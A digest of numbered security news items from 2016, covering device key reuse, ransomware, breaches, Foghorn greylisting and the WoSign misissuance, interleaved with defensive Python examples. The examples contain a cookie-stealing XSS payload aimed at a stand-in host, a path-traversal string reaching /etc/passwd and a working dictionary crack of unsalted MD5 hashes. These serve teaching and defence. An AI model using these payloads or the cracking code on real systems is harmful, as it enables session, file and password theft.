Devices and gadgets are still sharing private keys for their built-in HTTPS and SSH servers, basically. It is not difficult to extract these keys from the gizmos and use them to eavesdrop on encrypted connections and interfere with the equipment: imagine intercepting a connection to a web-based control panel, decrypting it, and altering the configuration settings on the fly. And because so many models and products are using the same keys, it's possible to attack thousands of boxes at once.

SEC Consult senior security consultant Stefan Viehböck scanned the public internet and found that the practice of using known private keys has increased over the past nine months, with the number of net-accessible vulnerable devices ballooning to more than 4.5 million network appliances, IoT devices, and embedded systems around the world. That's up 40 per cent, or 1.3 million, from November, according to SEC Consult.
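The check that turns a scan like SEC Consult's into a finding is simple: fingerprint every host key and look for fingerprints that more than one host presents. The following added example (not SEC Consult's tooling) does that over lines in the format `ssh-keyscan` prints; the hosts and key blobs are constructed placeholders, not real keys.

```python
"""Group SSH scan results by host-key fingerprint to find keys shared across
devices. Added example; the sample records below are constructed and the key
blobs are placeholders rather than real public keys."""
import base64
import hashlib
from collections import defaultdict
from typing import Dict, List, Tuple


def openssh_fingerprint(key_b64: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + base64(SHA-256(key blob)) without '=' padding."""
    blob = base64.b64decode(key_b64)
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_keyscan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Parse 'host keytype base64key' records; '#' lines are ssh-keyscan's banner comments."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, ktype, key = line.split()[:3]
        records.append((host, ktype, key))
    return records


def shared_keys(records: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Map fingerprint -> hosts presenting it, keeping only fingerprints seen on >1 host."""
    by_fp: Dict[str, List[str]] = defaultdict(list)
    for host, _ktype, key in records:
        by_fp[openssh_fingerprint(key)].append(host)
    return {fp: hosts for fp, hosts in by_fp.items() if len(hosts) > 1}


# Constructed sample: three devices, two of which ship the same factory key.
KEY_SHARED = base64.b64encode(b"constructed-vendor-firmware-key").decode()
KEY_UNIQUE = base64.b64encode(b"constructed-per-device-key").decode()
SAMPLE = [
    "# 192.0.2.10:22 SSH-2.0-constructed-banner",
    "192.0.2.10 ssh-rsa " + KEY_SHARED,
    "198.51.100.7 ssh-rsa " + KEY_SHARED,
    "203.0.113.5 ssh-rsa " + KEY_UNIQUE,
]

if __name__ == "__main__":
    for fp, hosts in shared_keys(parse_keyscan(SAMPLE)).items():
        print(f"{fp} shared by {len(hosts)} hosts: {', '.join(hosts)}")
```

Real input comes from `ssh-keyscan -t rsa,ecdsa,ed25519 -f hosts.txt`, run against address ranges you are authorised to scan; the same grouping applies to TLS certificate fingerprints collected from HTTPS admin interfaces. Any fingerprint that appears on devices you do not administer together is a key you must assume is public.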
#1431 Modified USB ethernet adapter can steal Windows and Mac credentials
Security researcher Rob Fuller has discovered a unique attack method that can steal PC credentials from Windows and Mac computers, and possibly Linux (currently untested).

Fuller's attack is effective against locked computers on which the user has already logged in.

The researcher used USB-based Ethernet adapters, for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it's connected to.

The attack is possible because most computers will automatically install any plug-and-play (PnP) USB device.

"Why does this work? Because USB is Plug-and-Play. This means that even if a system is locked out, the device still gets installed," Fuller explained.

"Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list."
#1430 Critical flaws found in network management systems
Eleven critical vulnerabilities have been patched in network management systems (NMS) from four leading manufacturers: Cloudview, Netikus, Paessler and Opmantek. The flaws enable remote cross-site scripting and command-injection attacks.

Public disclosure of the vulnerabilities coincided with a technical description released by Rapid7 on Wednesday; the research complements earlier work on similar bugs found in 2015.

The 11 vulnerabilities varied widely, but they shared a common technique: malicious content injected via Simple Network Management Protocol (SNMP) packets is later rendered by the NMS web console, letting the attacker take control of the browser window displaying it, said Tod Beardsley, principal security research manager at Rapid7, in a blog post.
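The WordPress image-filename XSS (#1440, #1438) and the SNMP-injected NMS console XSS above are the same bug class: a string the application did not generate is concatenated into HTML. The following added, generic illustration (not WordPress's, Rapid7's or any NMS vendor's code) shows the vulnerable rendering beside the escaped form for both inputs, and the root-confinement check that addresses the path traversal also fixed in WordPress 4.6.1; the sample filename, sysDescr string and upload root are constructed.

```python
"""Untrusted strings rendered into HTML (an uploaded filename, an SNMP sysDescr),
vulnerable and escaped, plus a path-traversal guard for an upload directory.
Added generic illustration; sample inputs and paths are constructed."""
import html
import os
from typing import Optional

# Constructed sample inputs of the shape each story describes.
FILENAME = 'photo" onload="alert(1)" x=".png'          # hypothetical crafted upload name
SYSDESCR = 'Router <script>new Image().src="http://evil.invalid/?"+document.cookie</script>'
UPLOAD_ROOT = "/var/www/uploads"                         # hypothetical upload directory


def render_attachment_vulnerable(filename: str) -> str:
    """Concatenation: a quote in the filename closes the attribute and adds a handler."""
    return '<img src="/uploads/' + filename + '" alt="' + filename + '">'


def render_attachment_safe(filename: str) -> str:
    """Escape for the attribute context; quote=True also encodes ' and \"."""
    safe = html.escape(filename, quote=True)
    return '<img src="/uploads/' + safe + '" alt="' + safe + '">'


def render_device_row_vulnerable(sysdescr: str) -> str:
    """An NMS table cell built from the device-supplied sysDescr, unescaped."""
    return "<tr><td>" + sysdescr + "</td></tr>"


def render_device_row_safe(sysdescr: str) -> str:
    """Same cell with the text escaped: <script> becomes inert &lt;script&gt;."""
    return "<tr><td>" + html.escape(sysdescr) + "</td></tr>"


def safe_upload_path(root: str, user_path: str) -> Optional[str]:
    """Resolve a user-supplied relative path under root; None if it escapes root.
    realpath collapses '..' and symlinks before the prefix comparison, and
    os.path.join discards root when user_path is absolute, which the check catches."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, user_path))
    if candidate == root_real or candidate.startswith(root_real + os.sep):
        return candidate
    return None


if __name__ == "__main__":
    print(render_attachment_vulnerable(FILENAME))
    print(render_attachment_safe(FILENAME))
    print(render_device_row_vulnerable(SYSDESCR))
    print(render_device_row_safe(SYSDESCR))
    print(safe_upload_path(UPLOAD_ROOT, "2016/09/photo.png"))
    print(safe_upload_path(UPLOAD_ROOT, "../../../etc/passwd"))
```

The escaping function must match the context the string lands in: `html.escape` is right for element text and quoted attributes, but a value placed inside a URL, a JavaScript string or a CSS property needs that context's encoder instead. For the path check, a simple `".." in user_path` test is not enough, because encoded or symlinked forms bypass it; resolving first and comparing against the resolved root is what closes the hole.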
#1429 "Catastrophic" DDoS attack pummels Linode servers over labor day weekend
Linode, one of the world's top providers of virtual private servers (VPS), battled over the weekend with a DDoS attack that targeted its Atlanta data center and that the company has described as "catastrophic."

The attack, aimed at the company's Atlanta data center, started on Saturday, September 3, around 21:00 UTC, and got the Linode team scrambling for answers.

Three and a half hours later, Linode engineers were informing customers that they experienced "a catastrophic DDoS attack which is being spread across hundreds of different IP addresses in rapid succession, making mitigation extremely difficult."

During all this time, connectivity to the service was down, affecting Linode customers such as Clojars, a repository of open source Clojure libraries that relies on the Linode infrastructure.

The attack started subsiding by Monday, September 5, around 21:30 UTC. The attack's start and end date were perfectly timed to fit the US Labor Day extended holiday weekend.
#1428 Cry ransomware uses UDP, Imgur, Google Maps
Ransomware purporting to come from a phony government agency, something called the Central Security Treatment Organization, has been making the rounds, researchers say.

The ransomware, already known by several names including Cry, CSTO ransomware and Central Security Treatment Organization ransomware, communicates over the User Datagram Protocol (UDP) and also makes use of the photo sharing service Imgur and Google Maps as part of its infection routine.

A security researcher who goes under the guise MalwareHunterTeam discovered the malware last Thursday.
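Both #1439 and #1428 describe the same trick: victim data leaves the network inside what looks like an image upload to a legitimate host. An egress gateway cannot rely on the file extension, but it can parse the PNG container. The following added example (not Trend Micro's or MalwareHunterTeam's detection logic) walks the chunk structure, verifies chunk CRCs, and flags the two easy hiding places, bytes appended after `IEND` and oversized ancillary chunks; the images it inspects are constructed in the code.

```python
"""Walk PNG chunks and flag payload smuggling: data appended after IEND, or
unusually large ancillary chunks. Added example with images constructed below;
not any vendor's detection code. Thresholds are assumptions."""
import struct
import zlib
from typing import Dict, List, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Length, type, data, CRC-32 over type + data (PNG spec, chunk layout)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width: int = 1, height: int = 1, extra_chunks=(), trailer: bytes = b"") -> bytes:
    """Build a minimal valid 8-bit greyscale PNG (constructed sample), optionally
    with extra chunks before IEND and/or bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x80" * width for _ in range(height))  # filter byte 0 per row
    png = PNG_SIG + make_chunk(b"IHDR", ihdr) + make_chunk(b"IDAT", zlib.compress(raw))
    for ctype, data in extra_chunks:
        png += make_chunk(ctype, data)
    return png + make_chunk(b"IEND", b"") + trailer


def parse_chunks(png: bytes) -> Tuple[List[Tuple[bytes, int, bool]], bytes]:
    """Return ([(type, length, crc_ok), ...], bytes after IEND). Raises on malformed input."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    chunks = []
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 12 + length
        if end > len(png):
            raise ValueError("truncated chunk")
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:end])
        chunks.append((ctype, length, crc == (zlib.crc32(ctype + data) & 0xFFFFFFFF)))
        pos = end
        if ctype == b"IEND":
            return chunks, png[pos:]
    raise ValueError("no IEND chunk")


def smuggling_findings(png: bytes, max_ancillary: int = 4096) -> Dict[str, object]:
    """Heuristics an upload handler or egress proxy could apply to an outbound image.
    max_ancillary is an assumed threshold; tune it to the images you actually see."""
    chunks, trailer = parse_chunks(png)
    # Ancillary chunks have a lower-case first letter (bit 5 of the first type byte set).
    big_ancillary = [c.decode("latin-1") for c, n, _ in chunks if (c[0] & 0x20) and n > max_ancillary]
    bad_crc = [c.decode("latin-1") for c, _, ok in chunks if not ok]
    return {
        "trailing_bytes": len(trailer),
        "large_ancillary_chunks": big_ancillary,
        "bad_crc_chunks": bad_crc,
        "suspicious": bool(trailer) or bool(big_ancillary) or bool(bad_crc),
    }


if __name__ == "__main__":
    stolen = make_png(trailer=b"user=alice;host=WS01;")   # constructed exfil payload
    print(smuggling_findings(make_png()))
    print(smuggling_findings(stolen))
```

A viewer stops at `IEND`, so a site like Imgur happily stores and serves the file while the trailer rides along unchanged; the same is true of large `tEXt`/`zTXt` chunks. Data hidden in the pixel values themselves is not caught by structural checks like these and needs statistical or volume-based detection instead.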
#1427 Hackers “find Twitter exploit” and resurrect banned accounts
This should be a Halloween tale: Twitter accounts long dead and buried have been resurrected by a Frankenstein-like bunch of hackers.

We don’t know where they got the jolt of lightning to make these things burst from the grave, but as Business Insider reports, a hacking group calling itself Spain Squad allegedly seized Twitter accounts including @Hell, @Hitler, @Nazi, @ak47, and @1337: many of which had been previously suspended, while others had been inactive for quite some time.

The @Ziter account, claiming affiliation with Spain Squad, on Friday was offering a slew of accounts for sale, including those above as well as @botnet, @darknet, @LizardSquad, and @bypass.

As of Monday morning, Twitter hadn’t commented, though it had reburied the zombie accounts, suspending them yet again.
#1426 Google fixes final 'Quadrooter' flaws with new security patch
What took Google a month to fix took others just a couple of weeks.

In the latest round of Android security fixes released Tuesday, the company fixed two remaining flaws that were part of the so-called "Quadrooter" set of vulnerabilities announced last month.

Quadrooter was particularly troublesome because the set of four flaws (hence the name "quad") affected at least 900 million Android devices. These high-risk vulnerabilities would allow a dedicated and well-trained attacker to gain complete access to an affected phone and its data.
#1425 Banking trojan, Gugi, evolves to bypass Android 6 protection
Almost every Android OS update includes new security features designed to make cybercriminals’ life harder. And, of course, the cybercriminals always try to bypass them.

We have found a new modification of the mobile banking Trojan, Trojan-Banker.AndroidOS.Gugi.c that can bypass two new security features added in Android 6: permission-based app overlays and a dynamic permission requirement for dangerous in-app activities such as SMS or calls. The modification does not use any vulnerabilities, just social engineering.
#1424 Russian internet giant Rambler.ru hacked, leaking 98 million accounts
Russian internet portal and email provider Rambler.ru has become the latest victim in a growing list of historical hacks.

Breach notification site LeakedSource.com, which obtained a copy of an internal customer database, said the attack dates back to February 17, 2012.

More than 98.1 million accounts were in the database, including usernames, email addresses, social account data, and passwords, the group said in a blog post. Unlike other major breaches, the passwords were stored in plaintext rather than hashed, meaning anyone at the company could easily read them.

The last time a breach on this scale was found to have used plaintext password storage was at Russian social networking site VK.com, which had 171 million accounts taken.
#1423 Pokémon-themed umbreon Linux rootkit hits x86, ARM systems
The Trend Micro Forward Looking Threat Research team recently obtained samples of a new rootkit family from one of our trusted partners. We are providing a detailed analysis of the rootkit, and also making the samples available to the industry to help others block this threat.

This rootkit family called Umbreon (sharing the same name as the Pokémon) targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well. (An aside: the rootkit does appear to be named after the Pokémon of the same name. This Pokémon is known for hiding in the night, which is an appropriate characteristic for a rootkit.) We detect Umbreon under the ELF_UMBREON family.
#1422 Google Chrome fixes serious vulnerabilities, thanks to bug fighters
The latest Google Chrome browser update comes with 33 vulnerability patches, including 13 rated high-severity. Credit goes to the community contributors and bug hunters who reported the flaws through Chrome's bug bounty program.

Many of the vulnerabilities fixed in this release were in Blink, the browser's rendering engine, but some of the higher-severity discoveries were in Chrome's built-in PDF reader, PDFium.

This big rollout of bug fixes follows another busy month, where 48 vulnerabilities were patched in July alone. Some of the bug bounty contributors netted themselves quite a bit of cash too, up to $7,500 per cross-site scripting bug caught.
#1421 German spies violated law, must delete XKeyscore database - watchdog
Germany's spies seriously violated the country's laws multiple times, according to a secret report from its federal data protection commissioner Andrea Voßhoff.

The legal analysis, leaked to Netzpolitik, was made in July 2015 following a visit by data protection officials to Bad Aibling in southern Germany, in the wake of Edward Snowden's revelations about surveillance activities there. Bad Aibling is jointly run by Germany's intelligence agency, the Bundesnachrichtendienst (BND), and the NSA.

As well as listing 18 serious legal violations, and filing 12 formal complaints—the German data watchdog's most severe legal instrument—the secret report said that the BND created seven databases without the appropriate legal approval. As a result, commissioner Voßhoff said that all seven databases should be deleted, and could not be used again.
#1420 Police seize two Perfect Privacy VPN servers
A few days ago the company informed its customers that two of its servers had been seized by the police in Rotterdam, Netherlands. The authorities went directly to the hosting company I3D and the VPN provider itself wasn’t contacted by law enforcement.

“Currently we have no further information since the responsible law enforcement agency did not get in touch with us directly, we were merely informed by our hoster,” Perfect Privacy says.

Despite losing control over two servers, Perfect Privacy assures its customers that no personally identifiable data is present on the seized hardware. Like many other VPNs, the company maintains a strict no-logging policy.

“Since we are not logging any data there is currently no reason to believe that any user data was compromised,” the VPN provider says.
#1419 US would be 28th In 'Hacking Olympics', China would take the gold
Which countries have the best programmers in the world?

Many would assume it’s the United States. After all, the United States is the home of programming luminaries such as Bill Gates, Ken Thompson, Dennis Ritchie, and Donald Knuth. But then again, India is known as the fastest growing concentration of programmers in the world and the hackers from Russia are apparently pretty effective. Is there any way to determine which country is best?

At HackerRank, we regularly post tens of thousands of new coding challenges for developers to improve their coding skills. Hundreds of thousands of developers from all over the world come to participate in challenges in a variety of languages and knowledge domains, from Python to algorithms to security to distributed systems. Our community is growing everyday, with over 1.5 million developers ranked. Developers are scored and ranked based on a combination of their accuracy and speed.

According to our data, China and Russia score as the most talented developers. Chinese programmers outscore all other countries in mathematics, functional programming, and data structures challenges, while Russians dominate in algorithms, the most popular and most competitive arena. While the United States and India provide the majority of competitors on HackerRank, they only manage to rank 28th and 31st.
#1418 Kali Linux 2016.2 released as the most advanced penetration testing distribution
The Kali Linux (successor to BackTrack) developers are back from the DEF CON Vegas and Black Hat conferences for security professionals and ethical hackers, and as they promised earlier this year, they're now announcing the availability of Kali Linux 2016.2.

What's Kali Linux 2016.2? Well, it's an updated Live ISO image of the popular GNU/Linux distribution designed for ethical hackers and security professionals who want to harden the security of their networks, which contains the latest software versions and enhancements for those who want to deploy the OS on new systems.

It's been quite some time since the last update to the official Kali Linux Live ISOs, and new software releases are announced each day, which means that the packages included in the previous Kali Linux images are very old, and bugs and improvements are always implemented in the most recent versions of the respective security tools.
#1417 How spy tech firms let governments see everything on a smartphone
SAN FRANCISCO — Want to invisibly spy on 10 iPhone owners without their knowledge? Gather their every keystroke, sound, message and location? That will cost you $650,000, plus a $500,000 setup fee with an Israeli outfit called the NSO Group. You can spy on more people if you would like — just check out the company’s price list.

The NSO Group is one of a number of companies that sell surveillance tools that can capture all the activity on a smartphone, like a user’s location and personal contacts. These tools can even turn the phone into a secret recording device.

Since its founding six years ago, the NSO Group has kept a low profile. But last month, security researchers caught its spyware trying to gain access to the iPhone of a human rights activist in the United Arab Emirates. They also discovered a second target, a Mexican journalist who wrote about corruption in the Mexican government.
#1416 Android patch fixes Nexus 5X critical vulnerability
Google’s Android security team has patched a vulnerability that left Nexus 5X devices open to attack even if the phone’s screen was locked. The vulnerability in Google’s line of phones would have allowed an adversary to exfiltrate data from the targeted phone via a forced memory dump of the device.

Researchers at IBM’s X-Force Application Security Research Team discovered the flaw several months ago and worked with Google on a patch that was deployed recently. Disclosure of the vulnerability was shared by IBM’s X-Force team on Thursday.
#1415 Microsoft adds .NET core, ASP.NET to bug bounty program
Microsoft is stepping up its bug hunting efforts surrounding its Visual Studio development suite, adding Microsoft .NET Core and ASP.NET Core to its Bug Bounty program.

The bounties opened yesterday and will run “indefinitely,” according to Microsoft. The bounty program includes the Windows and Linux versions of .NET Core and ASP.NET Core.
#1414 And the worst passwords from the Last.fm hack are…
Apparently user passwords were stored as unsalted MD5 hashes, which LeakedSource says took just two hours to convert back into readable plaintext passwords.

While Last.fm's password hashing left much to be desired, sadly the breached passwords themselves weren't much better.

The most popular password by far? “123456” – yes, seriously.
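Two hours for a dump of this size is plausible precisely because the hashes were unsalted: every user who chose "123456" has the identical MD5, so one pass over a wordlist cracks all of them at once. The following added example (not LeakedSource's method or Last.fm's code) runs that dictionary attack on a constructed four-user dump, then shows the salted, iterated storage that forces the attacker to redo the work per user; the user names, passwords and iteration count are constructed.

```python
"""Dictionary attack on unsalted MD5 versus per-user salted PBKDF2 storage.
Added example with a constructed mini-dump; not Last.fm's code or
LeakedSource's tooling. Wordlist and iteration count are assumptions."""
import hashlib
import hmac
import os
from typing import Dict, List, Tuple

WORDLIST = ["123456", "password", "lastfm", "qwerty", "letmein"]  # constructed, tiny


def md5_hex(pw: str) -> str:
    return hashlib.md5(pw.encode()).hexdigest()


# Constructed leak: (username, unsalted MD5). Two users picked the same weak password.
LEAK: List[Tuple[str, str]] = [
    ("alice", md5_hex("123456")),
    ("bob", md5_hex("123456")),
    ("carol", md5_hex("lastfm")),
    ("dave", md5_hex("correct horse battery staple")),
]


def crack_unsalted(leak: List[Tuple[str, str]], wordlist: List[str]) -> Dict[str, str]:
    """Hash each candidate once, then look every leaked hash up in that table.
    Cost is O(words + users): the whole dump falls for the price of one wordlist pass."""
    table = {md5_hex(w): w for w in wordlist}
    return {user: table[h] for user, h in leak if h in table}


def store_password(pw: str, iterations: int = 100_000) -> Tuple[bytes, bytes]:
    """Per-user random salt plus PBKDF2-HMAC-SHA256 (iteration count is an assumption;
    pick it from your own latency budget). Returns (salt, derived_key)."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)


def verify_password(pw: str, salt: bytes, stored: bytes, iterations: int = 100_000) -> bool:
    """Recompute with the user's salt; compare_digest avoids a timing side channel."""
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return hmac.compare_digest(candidate, stored)


def guesses_needed(n_users: int, n_words: int, salted: bool) -> int:
    """Hash computations for a full wordlist attack on the whole dump.
    Unsalted: one table serves everyone. Salted: every (user, word) pair is separate work."""
    return n_users * n_words if salted else n_words


if __name__ == "__main__":
    print("cracked:", crack_unsalted(LEAK, WORDLIST))
    print("unsalted cost:", guesses_needed(len(LEAK), len(WORDLIST), salted=False))
    print("salted cost:", guesses_needed(len(LEAK), len(WORDLIST), salted=True))
```

The salt alone only removes the shared-table shortcut; the iteration count (or a memory-hard function such as scrypt or Argon2) is what makes each of those per-user guesses expensive enough to matter. Neither helps a user whose password is "123456", which is why the cracked list above still includes two accounts even in the salted world once the attacker is willing to pay per user.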
#1413 Why identity protection is the next phase in security
Talk to any security expert, and sooner or later the line "It's not a case of if you are hacked, but when" will be trotted out. It's a good line because it is true and demonstrates how perimeter-style security has fallen by the wayside.

But consider the implicit implications of everyone eventually being breached, not as a sysadmin or security specialist, but as a user of services, and you will realise what it means for your personal information.

Whether today, tomorrow, or next year, eventually the personal information you have handed over to third parties is going to find its way online, and there is not a thing you can do to stop it.
#1412 This data-stealing Trojan is the first to also infect you with ransomware
As if stealing your personal data wasn't bad enough, one form of Trojan malware has now become the first of its kind by also infecting victims with ransomware, forcing targets to pay to regain access to their computer as well as compromising their credentials.

Betabot, which steals banking information and passwords, has been around since March 2013. It disables antivirus and malware-scanning software on infected Windows machines before modifying them to steal users' login credentials and financial data.

But now, according to cybersecurity researchers at Invincea, Betabot is "breaking new ground", becoming the first known weaponised password-stealing malware that also infects victims with ransomware in a second stage of attack.
#1411 Report: Smartphone infection rate doubled in first half of 2016
Smartphone infection rates nearly doubled during the first half of this year, from 0.25 percent to 0.49 percent compared to the second half of 2015, according to a report released today by Nokia.

Nokia provides endpoint malware detection services to major mobile carriers and covers 100 million devices around the world, with the exception of China and Russia, said Kevin McNamee, director of the Nokia Threat Intelligence Lab.

Android devices were the most targeted, accounting for 74 percent of the infections.

iPhones accounted for 4 percent, and Windows phones did not show up in the statistics at all, due to their low market share and low infection rates.

The remaining 22 percent of infections were laptops and personal computers connecting via tethered smartphones or WiFi hotspots.

Infection rates varied by month, with a spike in April. Mobile infections hit an all-time high that month, with one out of every 120 smartphones having some form of malware infection, such as ransomware, spyphone applications, SMS Trojans, personal information theft and overly aggressive adware.
#1410 TorrentLocker: Crypto-ransomware still active, using same tactics
In December 2014, ESET released a white paper about TorrentLocker, a crypto-ransomware family spread via spam email messages impersonating local postal services, energy companies or telecom providers. The paper described its distribution scheme, its core functionality and its network protocol, and exposed some similarities with the Hesperbot banking trojan.

During the last few months, we decided to take a look at new samples to check the current state of this malware family. This article summarizes the results of our analysis and compares the 2016 campaigns against our research from late 2014.
#1409 New OS X security updates patch same zero-days as iOS 9.3.5
Late last week, Apple released iOS 9.3.5 to patch three zero-day bugs that could be used to access personal data on an infected phone. Dubbed "Trident," the bugs were used to create spyware called Pegasus that was used to target at least one political dissident in the United Arab Emirates.

Today, Apple has released updates for Safari 9 and OS X El Capitan and Yosemite that collectively patch the three "Trident" bugs in its desktop operating system. It's not clear whether the bugs affect Mavericks or any older versions of OS X, but we've reached out to Apple for comment and will update the article if we receive a response.
#1408 New cloud attack takes full control of virtual machines with little effort
The world has seen the most unsettling attack yet resulting from the so-called Rowhammer exploit, which flips individual bits in computer memory. It's a technique that's so surgical and controlled that it allows one machine to effectively steal the cryptographic keys of another machine hosted in the same cloud environment.

Until now, Rowhammer has been a somewhat clumsy and unpredictable attack tool because it was hard to control exactly where data-corrupting bit flips happened. While previous research demonstrated that it could be used to elevate user privileges and break security sandboxes, most people studying Rowhammer said there was little immediate danger of it being exploited maliciously to hijack the security of computers that use vulnerable chips. The odds of crucial data being stored in a susceptible memory location made such hacks largely a matter of chance that was stacked against the attacker. In effect, Rowhammer was more a glitch than an exploit.
#1407 “Foghorn” takes users out of phish-fighting with DNS “greylisting”
Clickers gonna click. Despite mandatory corporate training, general security awareness, and constant harping about the risks of clicking on unverified links in e-mails and other documents, people have been, are now, and forever will click links where exploit kits and malware lurk. It's simply too easy with the slightest amount of targeted work to convince users to click.

Eric Rand and Nik Labelle believe they have an answer to this problem—an answer that could potentially derail not just phishing attacks but other kinds of malware as well. Instead of relying on the judgement of users, Rand and Labelle have been working on software that takes humans completely out of the loop in phishing defense by giving clicks on previously unseen domains a time out, "greylisting" them for 24 hours by default. The software, a project called Foghorn, does this by intercepting requests made to the Domain Name System (DNS).
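The decision Foghorn makes on each query is simple enough to state as a policy object. The example below is added here and is not Foghorn's code; it is driven by a caller-supplied clock in seconds so a query trace can be replayed offline. The 24-hour hold is the default the article gives; keying a name by its last two labels as a stand-in for the registrable domain, and the allowlist of internal names, are assumptions of this example, not features the article describes.

```python
"""Added example, not Foghorn's code: DNS greylisting as a resolver policy.
A never-seen domain answers NXDOMAIN until `hold` seconds after its first
query (24 hours by default, per the article). Assumption of this example:
the registrable domain is approximated by the last two labels."""

HOLD_DEFAULT = 24 * 3600  # seconds a never-seen domain stays unresolvable


class DnsGreylist:
    def __init__(self, hold=HOLD_DEFAULT, allowlist=()):
        self.hold = hold
        self.allowlist = {self._norm(a) for a in allowlist}
        self.first_seen = {}  # registrable domain -> time of first query
        self.log = []         # (time, qname, decision), for analyst review

    @staticmethod
    def _norm(name):
        return name.strip().rstrip(".").lower()

    @staticmethod
    def _registrable(name):
        # Assumption: last two labels. Production code should use the public
        # suffix list, otherwise every name under co.uk is keyed as "co.uk".
        labels = name.split(".")
        return ".".join(labels[-2:])

    def _allowlisted(self, name):
        return any(name == a or name.endswith("." + a) for a in self.allowlist)

    def decide(self, qname, now):
        """Return 'allow' (forward to the upstream resolver) or 'greylist'
        (answer NXDOMAIN). The first query for an unknown domain starts its
        clock; the name only resolves once `hold` seconds have passed, so a
        link to a freshly registered phishing domain goes nowhere when clicked."""
        name = self._norm(qname)
        if self._allowlisted(name):
            decision = "allow"
        else:
            first = self.first_seen.setdefault(self._registrable(name), now)
            decision = "allow" if now - first >= self.hold else "greylist"
        self.log.append((now, name, decision))
        return decision

    def held_domains(self, now):
        """Domains still inside their hold period: the review queue for an
        analyst, who can release a legitimate one early by allowlisting it."""
        return sorted(d for d, t in self.first_seen.items() if now - t < self.hold)


def replay(queries, allowlist=()):
    """Run a query trace [(time_s, qname), ...] and return the decisions."""
    g = DnsGreylist(allowlist=allowlist)
    return [(q, g.decide(q, t)) for t, q in queries]


if __name__ == "__main__":
    # Constructed trace: a user clicks a link to a freshly registered domain
    # at t=0 and again an hour later; a host under it is queried a day later.
    trace = [
        (0, "mail.corp.example"),
        (0, "invoice-login.example.net"),
        (3600, "invoice-login.example.net"),
        (24 * 3600, "cdn.invoice-login.example.net"),
    ]
    for qname, decision in replay(trace, allowlist=["corp.example"]):
        print(f"{qname:35} {decision}")
```

Two caveats a deployment has to face: keying by registrable domain means an attacker who has aged a domain past the hold can use any subdomain of it, while keying by exact hostname is stricter but will hold every new CDN or SaaS hostname an internal application starts using. Either way the held list has to be reviewed, or the first day of any new legitimate service is broken.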
#1406 Research: Companies fear mobile devices as massive cybersecurity threat
According to an online poll conducted by Tech Pro Research in June, everyday threats like security breaches involving mobile devices are more worrisome than acts of cybercrime.
#1405 Cybercrime and cyberwar: A spotter's guide to the groups that are out to get you
Cybercriminals are as varied as other internet users: just as the web has allowed businesses to sell and communicate globally, so it has given fraudsters the ability to plunder victims anywhere and set up crime networks that, previously, would have been impossible.

The web has become central to the smooth running of most developed economies, and the types of cybercrime have changed too. While 15 years ago the majority of digital crime was effectively a form of online vandalism, most of today's internet crime is about getting rich. "Now the focus is almost entirely on some kind of pay-off," says David Emm, principal security researcher at Kaspersky Lab.
#1404 How one man could have owned GitHub, and what happened next…
A WoSign customer wanted to acquire a certificate for the server name med.ucf.edu, a subdomain of the University of Central Florida’s domain ucf.edu.

The customer was duly authorised to run this subdomain, which belongs to the College of Medicine, so WoSign was correct to approve it.

However (and, in hindsight, by good fortune), the customer also accidentally applied for a certificate for www.ucf.edu, presumably having mistyped www.med.ucf.edu.

To his surprise (I am guessing at the customer’s gender here), the second application was approved as well.

This turned out to be more than just a one-off, because the customer did a second test, using a certificate in the name of another domain he had the right to control, namely anaccount.github.com (and anaccount.github.io).

Deliberately following the same faulty path that he had followed by mistake in his previous application, he ended up with a vouched-for certificate for all of github.com, github.io, and www.github.io.

As these are the primary server names for the popular source code hosting service GitHub, this would have been a blunder with serious consequences if a crook were to have spotted this trick and acquired the dodgy GitHub certificate with cybercrime in mind.
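The check WoSign's validation pipeline got wrong is small enough to write out. The example below is added here and is not WoSign's code; it states the rule a CA has to apply before issuing: proving control of a name entitles the applicant to that name and to names strictly below it, never to the parent, and the suffix match has to be on a label boundary. The names are the ones from the story; the wildcard handling and the case/trailing-dot normalisation are this example's additions.

```python
"""Added example (not WoSign's code): the domain-control check a CA must
apply before issuing, run against the names in the story."""


def normalize(name):
    return name.strip().rstrip(".").lower()


def authorizes(validated, requested):
    """True if proving control of `validated` entitles the applicant to a
    certificate for `requested`: the same name, or a name strictly below it.
    Control of a subdomain never reaches up to its parent, and the suffix
    match is on a label boundary, so evil-ucf.edu is not under ucf.edu."""
    v, r = normalize(validated), normalize(requested)
    if r.startswith("*."):
        # A wildcard covers every child of its base, so it needs the base
        # name itself (or an ancestor of it) to have been validated.
        base = r[2:]
        return base == v or base.endswith("." + v)
    return r == v or r.endswith("." + v)


def may_issue(validated_names, requested_names):
    """Split a multi-name request into (approved, rejected). A CA must only
    sign the approved list; the second WoSign request would have been
    reduced to anaccount.github.com with the github.com names refused."""
    rejected = [r for r in requested_names
                if not any(authorizes(v, r) for v in validated_names)]
    approved = [r for r in requested_names if r not in rejected]
    return approved, rejected


if __name__ == "__main__":
    print(may_issue(["med.ucf.edu"], ["med.ucf.edu", "www.ucf.edu"]))
    print(may_issue(["anaccount.github.com", "anaccount.github.io"],
                    ["anaccount.github.com", "github.com", "github.io", "www.github.io"]))
```

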